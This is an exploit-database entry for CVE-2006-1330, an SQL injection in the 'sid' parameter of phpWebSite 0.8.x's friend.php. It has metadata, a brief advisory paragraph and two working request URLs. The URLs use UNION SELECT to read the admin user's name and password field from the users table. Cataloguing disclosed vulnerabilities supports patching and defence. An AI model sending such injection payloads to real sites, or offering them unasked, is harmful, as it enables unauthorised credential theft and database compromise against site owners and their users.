phpWebSite 0.8.2/0.8.3 - 'friend.php?sid' SQL Injection
Author: DaBDouB-MoSiKaR
type: webapps
platform: php
port:
date_added: 2006-03-20
date_updated: 2013-08-09
verified: 1
codes: CVE-2006-1330;OSVDB-24044
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/17150/info
phpWebSite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Versions 0.83 and prior are vulnerable.
http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1